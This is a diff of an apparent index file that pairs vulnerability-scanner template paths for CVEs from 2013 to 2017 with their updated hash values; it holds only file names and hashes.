-http/cves/2015/CVE-2015-0554.yaml:90bbc10cd416a2f9c26a09f5c36a6580e4b3ee23 -http/cves/2015/CVE-2015-1000005.yaml:5dcdc588dde913b72b8391d6fc292cc372797d31 -http/cves/2015/CVE-2015-1000010.yaml:152fd144d88b46c5e1ce3a2fb7edd7a217d93d20 -http/cves/2015/CVE-2015-1000012.yaml:aaea7063930a52264b37dafa1cec49e67f62395b -http/cves/2015/CVE-2015-1427.yaml:0238c6f98ef7506ab65e46caf6fc23d3dfaa97a2 -http/cves/2015/CVE-2015-1503.yaml:1d995530d0deee3051b6fa50a38e7430b0c4bb25 -http/cves/2015/CVE-2015-1579.yaml:6caafb7514ff78f7082f8c4099df16f33274a856 -http/cves/2015/CVE-2015-1880.yaml:484e73c7c65155926c7b057f101e79271cfb5b92 -http/cves/2015/CVE-2015-2067.yaml:fe895e5104c650be59af8c6a0004a27cfcbcc36d -http/cves/2015/CVE-2015-2068.yaml:9a52b84fb25e881c66abbb32c044a71d5d180de5 -http/cves/2015/CVE-2015-2080.yaml:1cbe7382f84bf8211bfc818b0c3fa725ffd8765b -http/cves/2015/CVE-2015-2166.yaml:1f103b0227437d14caef90ad25ffc035063fa0d2 -http/cves/2015/CVE-2015-2196.yaml:9b21cd2fe21ef6282bf4d2c6454364ffb5476e70 -http/cves/2015/CVE-2015-2755.yaml:94f949d122bec79c5bfe3ed7b1f74e1d9de16453 -http/cves/2015/CVE-2015-2807.yaml:5f45af660bdb564d7b19d60e3d1459f53368df70 -http/cves/2015/CVE-2015-2863.yaml:5d7fbce5a57ad9f31ba52cf0827da1441001b9e6 -http/cves/2015/CVE-2015-2996.yaml:98f400c774637684c2da791203cc15bd665e1acc -http/cves/2015/CVE-2015-3035.yaml:e67fc66369e4be9e2f8d21e50b1a5000853acf2d -http/cves/2015/CVE-2015-3224.yaml:2486456c060bdbbb3aa5ebf40f36e5a147fa68f3 -http/cves/2015/CVE-2015-3337.yaml:0a2ca418d230424c9f030389e91185e36e319a62 -http/cves/2015/CVE-2015-3648.yaml:5b97660133aa171d6900190cb3cf1833da8c4d88 -http/cves/2015/CVE-2015-3897.yaml:2e58a0d6ea3fc86de4bf3185829e1ce10bce258e -http/cves/2015/CVE-2015-4050.yaml:1c3a629652d82309a8d5df324ce53426823ee175 -http/cves/2015/CVE-2015-4062.yaml:3fb3653aad608dd0da03accb4353aaf62c0ff4da -http/cves/2015/CVE-2015-4063.yaml:0e27bdc015ce68787bf14cf6f9d41b96479a4fcc -http/cves/2015/CVE-2015-4074.yaml:34b0bbd729dc3d41f8e6382961dfbe74a8c80016 -http/cves/2015/CVE-2015-4127.yaml:9686ce65bff6a5b8388602099f8dc8576f8d7f11 -http/cves/2015/CVE-2015-4414.yaml:182d73cebb2c29618de45a5361b5236fd75f5560 -http/cves/2015/CVE-2015-4632.yaml:10b9f1ed3815dd9d8fb18eb8c1499d1d329aa20e -http/cves/2015/CVE-2015-4666.yaml:61a52e8b68a74640864acac7e246629d946726a1 -http/cves/2015/CVE-2015-4668.yaml:3803c9eb1128490702b2de84099d83a324111530 -http/cves/2015/CVE-2015-4694.yaml:d018f81843f0b65f12bbaf59731e7bdee4479393 -http/cves/2015/CVE-2015-5354.yaml:75f80318aad0756eaa5d91358597a68d02fd56ac -http/cves/2015/CVE-2015-5461.yaml:e499afd4da862214fc7feeab1fb03d6f5bfece03 -http/cves/2015/CVE-2015-5469.yaml:f2bc6d905f076a713563d961cb4adfc834b77451 -http/cves/2015/CVE-2015-5471.yaml:f5e2c69b223f8fd0f88972c5da82276805ca608a -http/cves/2015/CVE-2015-5531.yaml:773a383e2e70d0f8c4c81456c3e5e15fa4cd6b95 -http/cves/2015/CVE-2015-5688.yaml:af0e47039ef055e0c374b897a0224af8e85e14b8 -http/cves/2015/CVE-2015-6477.yaml:97f9c1038338ae8a02cd36a5cef975d18a552776 -http/cves/2015/CVE-2015-6544.yaml:3da7b9fdfaa2961b7e9c3cf0e5828ae266fb4ea3 -http/cves/2015/CVE-2015-6920.yaml:2b31f604b9a4593a0064eaed314d5ab771c8e5a4 -http/cves/2015/CVE-2015-7245.yaml:2d8b593c6e9ba4397e266a937ea16b23000518ec -http/cves/2015/CVE-2015-7297.yaml:af18a5cf6eb8fa3665a35c61fe7f68666777488f -http/cves/2015/CVE-2015-7377.yaml:b284bd533cdd6d5fc35e18a0bc6d8ce8967bdba7 -http/cves/2015/CVE-2015-7450.yaml:22103d4219a3b7e3fc6854b79cf6dd566dfcaf19 -http/cves/2015/CVE-2015-7780.yaml:9d8ea080890c820e804105fc9654489544aad93f -http/cves/2015/CVE-2015-7823.yaml:6a07ed9198ab50bf1861c259c1bd934ccddc578d -http/cves/2015/CVE-2015-8349.yaml:cb0a3975d9d4520b1d668738be9cc4ba3cf8231d -http/cves/2015/CVE-2015-8399.yaml:8a32ea6d70a8f8ff5d0618e223a7420db13c09c3 -http/cves/2015/CVE-2015-8813.yaml:2a3cd7a262f936c7732e99e8e479ef352185da4e -http/cves/2015/CVE-2015-9312.yaml:8932b5ccd1d871ee79be9b4c40f52649512c8078 -http/cves/2015/CVE-2015-9414.yaml:cdac64ec0a96fa0ff613979139f469f5374b4996 -http/cves/2015/CVE-2015-9480.yaml:c47daf3d68a7900fdf1dbe5d468357811f3cc7e4 -http/cves/2016/CVE-2016-0957.yaml:fb5200cbbb3791588e0d459db08bd04677d99cb1 -http/cves/2016/CVE-2016-1000126.yaml:d28ca6f9a829d9d0b04c5b0f6a8003048fa93fcf -http/cves/2016/CVE-2016-1000127.yaml:b3ab4a8d589329e2e7f864e062348aeb7bdff394 -http/cves/2016/CVE-2016-1000128.yaml:f7860a17e3e899916be1b2966aa9651eb62b2979 -http/cves/2016/CVE-2016-1000129.yaml:0b4bc656211d93a1f7cbebc45ea7527aab85b13c -http/cves/2016/CVE-2016-1000130.yaml:551b5acc68b45e315a836d75bfc966bbda602c13 -http/cves/2016/CVE-2016-1000131.yaml:6c927458a6a8b2a1ddbcdd095e35f59e151e82ad -http/cves/2016/CVE-2016-1000132.yaml:eb4a736f9081a7ecb0727b94af5438081681385a -http/cves/2016/CVE-2016-1000133.yaml:c000df8f59287a322bf76fd4b9b941715d212dbb -http/cves/2016/CVE-2016-1000134.yaml:e07983b24ee938e505d17e1294bab06999a062d3 -http/cves/2016/CVE-2016-1000135.yaml:5440a90f29eb04b23e154348308bf19ae9fc685f -http/cves/2016/CVE-2016-1000136.yaml:a21162f0ac032add7f75e56d393476a1c57d6260 -http/cves/2016/CVE-2016-1000137.yaml:6467129cc640d0a5f6f1770261334649e639d392 -http/cves/2016/CVE-2016-1000138.yaml:fd53303721ec97021fc08f1a6c775f37f2b9fc87 -http/cves/2016/CVE-2016-1000139.yaml:5d05ebf62bffdc048245c1adebcedf1e7a5df42d -http/cves/2016/CVE-2016-1000140.yaml:8f601534cea2c46b190df767ee78e2f0804122a1 -http/cves/2016/CVE-2016-1000141.yaml:51cb83532eff8aecfa6a7a5968a6f61b227cd6d9 -http/cves/2016/CVE-2016-1000142.yaml:d0aeb041b2a4ced4a95ae88fa9b29bc674720c5a -http/cves/2016/CVE-2016-1000143.yaml:5b8516600bea6bd30026c494600094bc794100b6 -http/cves/2016/CVE-2016-1000146.yaml:4951c4a894ce61af4f56d309505e58e6f3315055 -http/cves/2016/CVE-2016-1000148.yaml:c8120730b698354ec5b6290dd0a0db912e5ac87a -http/cves/2016/CVE-2016-1000149.yaml:6a9340b15e11a8df0440a422c84f4fe3e4356293 -http/cves/2016/CVE-2016-1000152.yaml:29de6ee00632f70261a97e4ee5e6b75980844522 -http/cves/2016/CVE-2016-1000153.yaml:15f454be1faabd7359d967e5129552c34a44b8b0 -http/cves/2016/CVE-2016-1000154.yaml:5852cdbca49c999b7965730daa624bac9f9edd34 -http/cves/2016/CVE-2016-1000155.yaml:74ed09324845c739b27b08377fb2cede7a9d77d8 -http/cves/2016/CVE-2016-10033.yaml:90534c75a6bd6c38856c1e5300db5bd2040880f5 -http/cves/2016/CVE-2016-10134.yaml:c01660b78a76141574a23156bded4ee5217a5ba4 -http/cves/2016/CVE-2016-10367.yaml:848c6524352c194e4e53cc4257d25c76e195e5c7 -http/cves/2016/CVE-2016-10368.yaml:0977411d167e134354d5481cfb975d038c1c01bc -http/cves/2016/CVE-2016-10924.yaml:3f3d43c24020739d8c972a56557b73ea2b47d3f2 -http/cves/2016/CVE-2016-10940.yaml:66c53f646bc717340c622f40612567fa75aae246 -http/cves/2016/CVE-2016-10956.yaml:d34d022f1915667fd84c116a58738e026be8cac0 -http/cves/2016/CVE-2016-10960.yaml:52cce206b82e588177dbb5908e188d71414ac3a5 -http/cves/2016/CVE-2016-10993.yaml:1cc6fe89f03785c62697e0c4dee86a5901eb53b6 -http/cves/2016/CVE-2016-1555.yaml:e1fa5dee19721b46b5636aa1d0f3279481c7a44d -http/cves/2016/CVE-2016-2389.yaml:c3006d5c6d35c3901fc173ab30a9b67fc02275f7 -http/cves/2016/CVE-2016-3081.yaml:88c300610c0c841aee2602b2f30c1d5f5f6c90bb +http/cves/2013/CVE-2013-3526.yaml:108d37a38aaccfde01ab6e9c385b121076912120 +http/cves/2013/CVE-2013-3827.yaml:7320b8c0f86be81b70a9bc9459487ea8d2fb972c +http/cves/2013/CVE-2013-4117.yaml:5afd1b94e0e88c3769c992cef70730a6935bc944 +http/cves/2013/CVE-2013-4625.yaml:de1e04f4329f6790405feee8b90e7f5a87353157 +http/cves/2013/CVE-2013-5528.yaml:86e3e424e0b6767c544688deedbb1945646b06d3 +http/cves/2013/CVE-2013-5979.yaml:c2e1571a0b87f33f74b63b0dd5f9091adb12aea4 +http/cves/2013/CVE-2013-6281.yaml:3fda5d9fb0bf6bec3b576e4592d619e5f69a1468 +http/cves/2013/CVE-2013-7091.yaml:5805ec28a263329493740a15ac4633c675fb88b6 +http/cves/2013/CVE-2013-7240.yaml:e6e459a20ab0b392f9fca5c00bbd45e5c143a160 +http/cves/2013/CVE-2013-7285.yaml:a4ed73abdf7c3f7fcc7a82c561343eea771bba26 +http/cves/2014/CVE-2014-10037.yaml:4e6a8bf73e6264d34ddb23d2b91775a3f817be22 +http/cves/2014/CVE-2014-1203.yaml:57779343d352812cd02d3f7c6981729ef3442d04 +http/cves/2014/CVE-2014-2321.yaml:d9a0a87fafda9ce28f5873cd8f7edceb618fdf8d +http/cves/2014/CVE-2014-2323.yaml:20dbe6a317073c9629bb7ee9e2009370bb84c058 +http/cves/2014/CVE-2014-2383.yaml:1a5d806fbb1c7d38a2c076c8e764e13bd28eabbd +http/cves/2014/CVE-2014-2908.yaml:c6966526499f85e9a8f3375b549a20f70cec40bb +http/cves/2014/CVE-2014-2962.yaml:4389400b4422a9beec6cf8a74da08b423e8f2558 +http/cves/2014/CVE-2014-3120.yaml:5fbbade265fc28e87a04dcfb079b61566eaa84c3 +http/cves/2014/CVE-2014-3206.yaml:24f7ae553f208291b74c3dacc9debc55a703c516 +http/cves/2014/CVE-2014-3704.yaml:24dc9468df58dd7b49c8d53df3698f5e62f22162 +http/cves/2014/CVE-2014-3744.yaml:d45a822a2cd6da107c5288298f15f3e078b6e4cb +http/cves/2014/CVE-2014-4210.yaml:10c660fa8db2287583f7c7b08223e461385662ee +http/cves/2014/CVE-2014-4513.yaml:a3e2a33b7f2b3597ee5942a7fc63074d7bad7912 +http/cves/2014/CVE-2014-4535.yaml:8d1b708014f163d623672c3ec8958356abcd4dad +http/cves/2014/CVE-2014-4536.yaml:84cd054c37d3b0475048a61e77109e3393a49a0b +http/cves/2014/CVE-2014-4539.yaml:ca1d7cabdca90481d4d7917918efcd96e6e06b77 +http/cves/2014/CVE-2014-4544.yaml:22f1b59f4ade01abf33b02eaf2e09a8a7bfac5d3 +http/cves/2014/CVE-2014-4550.yaml:83e1753987c608bdc1a86e5cdfb7d24c8636d6e9 +http/cves/2014/CVE-2014-4558.yaml:888c5523a91648d2ad0e1c823c15b5a5ed2c8989 +http/cves/2014/CVE-2014-4561.yaml:21a49cc52bfc1ea010d1f20e4bb9dfbbb250980f +http/cves/2014/CVE-2014-4592.yaml:c2075b91705a897f3313e98ea5b9d49c91f86eeb +http/cves/2014/CVE-2014-4940.yaml:95bda903fe27d409c4f6c486aea2b15d5dd02224 +http/cves/2014/CVE-2014-4942.yaml:95e3b5ede6164da335290bc7777861d769cce9e2 +http/cves/2014/CVE-2014-5111.yaml:8079551b242889dc357fc9d9365c6d8e2ea8aac2 +http/cves/2014/CVE-2014-5258.yaml:a263834117ff5a2c2acc4866c81784318b7963de +http/cves/2014/CVE-2014-5368.yaml:b0f2af3ae8940158d33a1a5208bc2e5c3d1e5d54 +http/cves/2014/CVE-2014-6271.yaml:48714c86e3b94dc6890225f34963d8d6fe96078b +http/cves/2014/CVE-2014-6287.yaml:6603a9b9c8b82cc44a26cfb5ea2608726655a95e +http/cves/2014/CVE-2014-6308.yaml:d1710f3b45fefdf63376e9f95994f594bf58125e +http/cves/2014/CVE-2014-8676.yaml:59ae78cdbca8ad6b78fa7ec7e444b66d378efad0 +http/cves/2014/CVE-2014-8682.yaml:cfb6b2ac7cd912ea7fab11e402bb00a1a5770070 +http/cves/2014/CVE-2014-8799.yaml:b225a41624218ea9b172ee124969283eb9768ab9 +http/cves/2014/CVE-2014-9094.yaml:4eb076a5dc1f1107e6bc715d77e329b16771919a +http/cves/2014/CVE-2014-9119.yaml:35f276b17110ead9b4f658b72f167d5146a7c094 +http/cves/2014/CVE-2014-9444.yaml:aa0730c98cb8ca3125d94ff9a2aa0a2e2497c170 +http/cves/2014/CVE-2014-9606.yaml:191404afc3e69b00445658a77dc931fed455e441 +http/cves/2014/CVE-2014-9607.yaml:2ff7028c724d61cf6222aed47aecafc75821444e +http/cves/2014/CVE-2014-9608.yaml:86e37788f84adee7160347618ef185c88e910648 +http/cves/2014/CVE-2014-9609.yaml:e063eeb08f32a9822206811decaee82ffbde4ced +http/cves/2014/CVE-2014-9614.yaml:d46ac40ef3a04a390473c7098096cabf7334a05d +http/cves/2014/CVE-2014-9615.yaml:02a8ea94c1ec8bd24dcc5f5f3237e2b71dd12ff8 +http/cves/2014/CVE-2014-9617.yaml:5b680bb96722bc59786a718651871a93093de6c0 +http/cves/2014/CVE-2014-9618.yaml:121028e822eeb0aca62348f939241b718dc725ac +http/cves/2015/CVE-2015-0554.yaml:3aec2bccaab6053576397cd62e489741e5d9e6f1 +http/cves/2015/CVE-2015-1000005.yaml:d06cbe1a1a3646b1912093687583412900349652 +http/cves/2015/CVE-2015-1000010.yaml:37f46894d8533185aa5ccae6d8587ce39c7c7112 +http/cves/2015/CVE-2015-1000012.yaml:b9fd9016d44f7799350f700ff0b3daf75ff15270 +http/cves/2015/CVE-2015-1427.yaml:9e57448504c0dec9c5aa0505e0eff4f9eef7b56d +http/cves/2015/CVE-2015-1503.yaml:396e2f22d519b999a6101f05f49842e23a41c339 +http/cves/2015/CVE-2015-1579.yaml:21c3a5fc8d1c84bab8b895300ff49daeb5c68298 +http/cves/2015/CVE-2015-1880.yaml:1bcade6f87214d5ddea408381d84d42675b8039a +http/cves/2015/CVE-2015-2067.yaml:c7d3aaba52d2012ebabede5d49659a5db444e914 +http/cves/2015/CVE-2015-2068.yaml:02b04ac143c40c899db151e9d835e34e5887c19e +http/cves/2015/CVE-2015-2080.yaml:ad5129a678ab43f38ef3d8b6af75b1009a46bea1 +http/cves/2015/CVE-2015-2166.yaml:c0c5cbab3f9015dd745ce339ac194688e2a872fe +http/cves/2015/CVE-2015-2196.yaml:0560c11f67ac5b9d0521d1595b0f148517f5c215 +http/cves/2015/CVE-2015-2755.yaml:ac889e94668bf841158eae64532e5291cf27dfcc +http/cves/2015/CVE-2015-2807.yaml:4dfb1ca9e39a1f71fdb77fe28aec4125675b1305 +http/cves/2015/CVE-2015-2863.yaml:704c25ee66a9fb224c03b09fb2ee9823820a43d1 +http/cves/2015/CVE-2015-2996.yaml:2f4f88b1b389b1782eb97896f56c9c796662ce2f +http/cves/2015/CVE-2015-3035.yaml:b0c3446eb4f7eded3343d2286f31a24c26777fc0 +http/cves/2015/CVE-2015-3224.yaml:da0a3f080cf543aa385bb7b50e6481b558173215 +http/cves/2015/CVE-2015-3337.yaml:27fdb7b6f19026602e9ee11acfeb047853257991 +http/cves/2015/CVE-2015-3648.yaml:a27664bb66919f26ccbe42cd62956fb5567e35d3 +http/cves/2015/CVE-2015-3897.yaml:611cb6dac3da0513727c50627a3c82bbab0b5ae0 +http/cves/2015/CVE-2015-4050.yaml:c98e898d400c19fdd67a32cb9af6401f454854e7 +http/cves/2015/CVE-2015-4062.yaml:30b03f01f399c91f92673f9db036b11a6af23016 +http/cves/2015/CVE-2015-4063.yaml:5a414d1d1966e5c306726d058b78ebf6c917abf7 +http/cves/2015/CVE-2015-4074.yaml:0d7c1fc75fe2df6cadc60006013ea8f23a07addd +http/cves/2015/CVE-2015-4127.yaml:54af82bf918e86c7358ae089d53b70d358c8e71b +http/cves/2015/CVE-2015-4414.yaml:517d9029388776fbe17ea573eda5b90dc41829a3 +http/cves/2015/CVE-2015-4632.yaml:5dfacd339c7664b5c461afcf71abd647ba46ac91 +http/cves/2015/CVE-2015-4666.yaml:7c18840f1f25165d9063b11222a9ed3298456178 +http/cves/2015/CVE-2015-4668.yaml:e8a32c32fc8747603a4bc346a82f5d5891a3bd92 +http/cves/2015/CVE-2015-4694.yaml:fb0afa93dfb0870081c11720d9a7209f80dcb71a +http/cves/2015/CVE-2015-5354.yaml:fefbcd5001514f4051acc2bfe9fd81dafa87e794 +http/cves/2015/CVE-2015-5461.yaml:9e543ea143f737f9533ccfa8ffbdc85e15d0b59a +http/cves/2015/CVE-2015-5469.yaml:8ed4c956b6381c604dbaa315815e74c9a86cc472 +http/cves/2015/CVE-2015-5471.yaml:ba0132128a5c68951adb5a6480b88508f90ea24a +http/cves/2015/CVE-2015-5531.yaml:04cc45e7956a6d226ec15284bfc811ba03531716 +http/cves/2015/CVE-2015-5688.yaml:eb19c4e2f0e59e13a3cb10260bde1486fab44073 +http/cves/2015/CVE-2015-6477.yaml:f9a3a46468c9ceb9c44099387c3d64be499b9afe +http/cves/2015/CVE-2015-6544.yaml:3523de53cc4662818e98604d34d8dbf1ab7c479b +http/cves/2015/CVE-2015-6920.yaml:b47f00a8832295d02be734a2264a0f4dc92e5787 +http/cves/2015/CVE-2015-7245.yaml:884bd343e53299f9135a5e1427f14a81fac562c7 +http/cves/2015/CVE-2015-7297.yaml:253dc308e1c298c5f0ee99454de30c2875ecf897 +http/cves/2015/CVE-2015-7377.yaml:b88194b79429b92c66c60a5dcc56800774d1259f +http/cves/2015/CVE-2015-7450.yaml:efd3e8db0f0371230fcd0b89d0a353fa63b8a0c7 +http/cves/2015/CVE-2015-7780.yaml:4486e682f755f3de6a60ab0aae25750ef87423ce +http/cves/2015/CVE-2015-7823.yaml:d8f2c449885b429d76198e87dfe380cc82f7c0d5 +http/cves/2015/CVE-2015-8349.yaml:830023fbf366f4c5fa664fe3a3dd032b64b49b3a +http/cves/2015/CVE-2015-8399.yaml:48e7f045415caac633389c6352248295db35229b +http/cves/2015/CVE-2015-8813.yaml:f12f646d67bb728a34127d0c8986f6a407c0c10f +http/cves/2015/CVE-2015-9312.yaml:63ee7007c3da79d3c312f8e65322fa42d50055f0 +http/cves/2015/CVE-2015-9414.yaml:1f8741d8e03606245f22efc0cd982195eb3cc221 +http/cves/2015/CVE-2015-9480.yaml:9939af606c4e8a0ca2da49b76c3e2885b6969bcb +http/cves/2016/CVE-2016-0957.yaml:5cb1b0e5b2ca228692fd85a2737bc7daa4244937 +http/cves/2016/CVE-2016-1000126.yaml:ee6e5e4d0ce4b82500a23e1b81a401762d0d67c6 +http/cves/2016/CVE-2016-1000127.yaml:7544b0605699041a8b8b4bb53b81c59de169039b +http/cves/2016/CVE-2016-1000128.yaml:164d3f6fba7367b7e64d7e582c66cbc4ab9417ba +http/cves/2016/CVE-2016-1000129.yaml:54e3a713e61583834288e9f5b30d04585656e22d +http/cves/2016/CVE-2016-1000130.yaml:a95b640c8ad3f07da178123ac835fb89166cfb55 +http/cves/2016/CVE-2016-1000131.yaml:44a15653e304c6b6120b05c96775210807ceea32 +http/cves/2016/CVE-2016-1000132.yaml:dd1bae3b8a9dc326c8c119463c82ac9facf5c00f +http/cves/2016/CVE-2016-1000133.yaml:5ea67ad0769b16dfe4c218c6b96749f207f85c6e +http/cves/2016/CVE-2016-1000134.yaml:41a11f24f552247f249f74d9c648f084beb1cfbd +http/cves/2016/CVE-2016-1000135.yaml:dd01c7649b258a65d2b72f324aaab635dab68b67 +http/cves/2016/CVE-2016-1000136.yaml:b316f4bba09958b46d69a21a8d9cb2b00e98a35a +http/cves/2016/CVE-2016-1000137.yaml:ace87b16932827161cfce951c1ee670a80414a52 +http/cves/2016/CVE-2016-1000138.yaml:35091758b4b6ddbd3c7ed5d11699e8727f786fa1 +http/cves/2016/CVE-2016-1000139.yaml:ebaa4eaabf1e731f951de9ed60d97f31f6aa3e62 +http/cves/2016/CVE-2016-1000140.yaml:248fbe1c6576102c61cfc04de0dc6e1ea39dcff5 +http/cves/2016/CVE-2016-1000141.yaml:d2abe25e576d459e218f81e66c63c8ba2323af6b +http/cves/2016/CVE-2016-1000142.yaml:7ee39ead343ea9979547d5471c199b8c86be9b2e +http/cves/2016/CVE-2016-1000143.yaml:2e30b6b98e3ca7748dc94372736a0e708dd7e0f2 +http/cves/2016/CVE-2016-1000146.yaml:7a3dc8718048bbdd74b74a629872a0145fbea4a1 +http/cves/2016/CVE-2016-1000148.yaml:7c45e64bad204dbb4ab382e5be5b0ac8a5669848 +http/cves/2016/CVE-2016-1000149.yaml:12c28354ae1b7352fbf21a4735310d21dd7a9839 +http/cves/2016/CVE-2016-1000152.yaml:b04f811177f7de2b7d1bc9c34cd69b8b5a7d534a +http/cves/2016/CVE-2016-1000153.yaml:839afe42cbc3ce138a9f268aa03c8c2b9568b0d4 +http/cves/2016/CVE-2016-1000154.yaml:de561a2279b84c4a93b45729a5c2b8e2ead95477 +http/cves/2016/CVE-2016-1000155.yaml:94e31829c124333f93dfde4cd736ac1acc4652e8 +http/cves/2016/CVE-2016-10033.yaml:6ab4266b85898f44462903ae877d9e9eb4feec93 +http/cves/2016/CVE-2016-10134.yaml:79a6a09db6c5f10f66c4a49b71b6546a36c0b74c +http/cves/2016/CVE-2016-10367.yaml:c89ddf372bf876656c2f6304b06f9c8a624deded +http/cves/2016/CVE-2016-10368.yaml:d41eb5fb9e202530ac7790c928697f04fdf355bc +http/cves/2016/CVE-2016-10924.yaml:dce16b47d39b9f8cb61dfa2e4a0ee8e81b1b93fe +http/cves/2016/CVE-2016-10940.yaml:dc778d0e3f008808558e3ed87fcb4b206fbcef3a +http/cves/2016/CVE-2016-10956.yaml:72f67ac65902558893d17ab4bfce99850ca8bed3 +http/cves/2016/CVE-2016-10960.yaml:e90cc536c6064e58b15b3daad819c925552e0f25 +http/cves/2016/CVE-2016-10993.yaml:5ffdb9d642dcb491977119e2f72992499b28a191 +http/cves/2016/CVE-2016-1555.yaml:0329f83a8bb07ae96f99d3981a10d47456fa9fcc +http/cves/2016/CVE-2016-2389.yaml:8e5424f39f5c1bdf16abc05cef7e7d53eaedff1d +http/cves/2016/CVE-2016-3081.yaml:5ec3a2d320d086ed486c7049ebf4663a2910221b http/cves/2016/CVE-2016-3088.yaml:1229823bd193d48dc72f8d3be3124020e1913fc9 -http/cves/2016/CVE-2016-3978.yaml:3328c40c88e9da601b3b312b101bbbc21c401a98 +http/cves/2016/CVE-2016-3978.yaml:64da42428395f2785338069fcb40056d994732c1 http/cves/2016/CVE-2016-4437.yaml:dc46f9dc5b67af371fbbac88f7a96e978e278845 -http/cves/2016/CVE-2016-4975.yaml:c31e2b9cf4cf61d17895569fed0d4c552a5e3b72 -http/cves/2016/CVE-2016-4977.yaml:b57a658c0ea52f208c0523c28a1e3e1bf308113e -http/cves/2016/CVE-2016-5649.yaml:b861ff276a53779bbc79ff83f340ad95cf73d394 +http/cves/2016/CVE-2016-4975.yaml:c75c7f664885e7f894c25b4e5990caa33b93db8d +http/cves/2016/CVE-2016-4977.yaml:50052e11eef92596666fa8e120266d1de0f0da5e +http/cves/2016/CVE-2016-5649.yaml:80db832906f68bcd8a4289b6871a7f2eae181502 http/cves/2016/CVE-2016-6195.yaml:6fea1eb939faed061414577f1d2f5b7aac952000 -http/cves/2016/CVE-2016-6277.yaml:825821d6dfe7227ce02c0b1d5451e0dcf4fcabe7 -http/cves/2016/CVE-2016-6601.yaml:0056ffce14a7b9396adb2b20530d3c5d9ab755a3 -http/cves/2016/CVE-2016-7552.yaml:af748d0296b2e06fe9a52e8eb2c3923c85ee2ae8 -http/cves/2016/CVE-2016-7834.yaml:123f05b72ee356971d80a84859bff9382efc1286 -http/cves/2016/CVE-2016-7981.yaml:0825636043d35ec4a656f72bd283400c2d9b7b5f -http/cves/2016/CVE-2016-8527.yaml:44c620ac62cfc88eff3d1259333d05b457826d70 -http/cves/2017/CVE-2017-0929.yaml:63d9d25b12a39f83e95756103dab35a075b60134 -http/cves/2017/CVE-2017-1000028.yaml:e8cb6aedd473e0aeeba2e89e2366aafb0d3617dd -http/cves/2017/CVE-2017-1000029.yaml:56f1dc6d9d33e1991a3353034fb6d82811d23353 -http/cves/2017/CVE-2017-1000163.yaml:3ea8f704a363596a99e1654e6e48450a5b6dde58 -http/cves/2017/CVE-2017-1000170.yaml:76f4dff15c6e88a662e9047ed7f473b0284deed9 -http/cves/2017/CVE-2017-1000486.yaml:ea39aca9110928772473d5604e30d23d431fb57d -http/cves/2017/CVE-2017-10075.yaml:351fb02ad0c7e72e08e0685ae0c9da70401092ed -http/cves/2017/CVE-2017-10271.yaml:082863d9d30fe7e425d457713606b7913cdf96d4 -http/cves/2017/CVE-2017-10974.yaml:9586d906dea96147909756849bc21b8ce76ebd1b -http/cves/2017/CVE-2017-11165.yaml:05ee4b5c3042bd4f50e20e4ee6b0016d3fe1438e -http/cves/2017/CVE-2017-11444.yaml:0893609b58d513e6778987e6dde47d2ba57ac514 -http/cves/2017/CVE-2017-11512.yaml:5f7380f2144caeaf10e9db8c4bb68216e3c3a1cf -http/cves/2017/CVE-2017-11586.yaml:95e4d006e26efef9bf4eda85febfb4ff96847c37 -http/cves/2017/CVE-2017-11610.yaml:a9807e9e66f3ed43922d45db7bab3006d30c9ef1 -http/cves/2017/CVE-2017-11629.yaml:e921343db2164fa615ecf0c431dfa8c0984adab8 -http/cves/2017/CVE-2017-12138.yaml:ac9c47cc1518ecf652f7250f8856a5db120638a2 -http/cves/2017/CVE-2017-12149.yaml:73c35ea9855e51f8e0aba33001326ade664c898e -http/cves/2017/CVE-2017-12542.yaml:8ad0adbb231a886f9c3598aaa80f6d1a9c7a8dd3 -http/cves/2017/CVE-2017-12544.yaml:175b419d781f89ea852d8f6b75bb3f753cebdbbc -http/cves/2017/CVE-2017-12583.yaml:e76f5dcd9af79f47aacc06203f141424a2d5e0fb -http/cves/2017/CVE-2017-12611.yaml:922b5324212b417f8292ce1263e14351569ab461 -http/cves/2017/CVE-2017-12615.yaml:f9094128fab304c4284351edbe8bcfa4d8cc5070 +http/cves/2016/CVE-2016-6277.yaml:1fe46bf7b5ad6e787f277bf9ca30c1572b2b2ce7 +http/cves/2016/CVE-2016-6601.yaml:fcee8665d595ede0942ef030b2b3094433c52ce6 +http/cves/2016/CVE-2016-7552.yaml:59575ec645f4be922b0ea88f77787ff6c18a9f8b +http/cves/2016/CVE-2016-7834.yaml:5d2791c955df7532895ba55fc5875be6398ed527 +http/cves/2016/CVE-2016-7981.yaml:b33d2af3dd9e683d82798d8d425e2c201018386e +http/cves/2016/CVE-2016-8527.yaml:8d5bb0a257862f0bf616fe764288a61c660270eb +http/cves/2017/CVE-2017-0929.yaml:ac1969f981236da05db7791e7bc1048daadd5958 +http/cves/2017/CVE-2017-1000028.yaml:d12ae10eb0a875539ec89b72716a381affd9f006 +http/cves/2017/CVE-2017-1000029.yaml:deffa596614295986da93d8a9c008fdee532135e +http/cves/2017/CVE-2017-1000163.yaml:401823c589c76420ddbf3a496714a32dd0bb785f +http/cves/2017/CVE-2017-1000170.yaml:62692276d6a342acffaff88006f125c6b0f4c10b +http/cves/2017/CVE-2017-1000486.yaml:9d2a1bbc6b6117a170bed22fc852963d9f910f51 +http/cves/2017/CVE-2017-10075.yaml:42e0ccea100f7f418bd2de07d600b86b0c0122d3 +http/cves/2017/CVE-2017-10271.yaml:087130227ceb0a7e50400b41edde4c83de33b9b6 +http/cves/2017/CVE-2017-10974.yaml:41a6fde79983cf2505d786d0db6a93b36d7f1ae8 +http/cves/2017/CVE-2017-11165.yaml:ed21a94d4c9b5c89aafbc85c526d566f2b581a31 +http/cves/2017/CVE-2017-11444.yaml:f71243dd2e862e6a68d8af9134f45fba505db107 +http/cves/2017/CVE-2017-11512.yaml:bcb197f1cb8d762dbc86c99c6778c22513e56457 +http/cves/2017/CVE-2017-11586.yaml:4e9e6dc15287e18c73d6d00dc0107baa53adf293 +http/cves/2017/CVE-2017-11610.yaml:2da2e660b57732bd14c84cc0b6d972aa44ed7c7e +http/cves/2017/CVE-2017-11629.yaml:6282005126f4198d94f7bb0611ca716d50f30ea2 +http/cves/2017/CVE-2017-12138.yaml:6b7e2c0025522b2d9acfdf8e7641eae9da477a44 +http/cves/2017/CVE-2017-12149.yaml:ee5b376e1cf48e48904cef2c21283717efb7e2c2 +http/cves/2017/CVE-2017-12542.yaml:2ec8a1004d2d837c42203d6fff6352929fcacb33 +http/cves/2017/CVE-2017-12544.yaml:88e72bd93fdb796a5c802944356bef0db6a23edc +http/cves/2017/CVE-2017-12583.yaml:8b2973170783bd975528829eed58c29e622619de 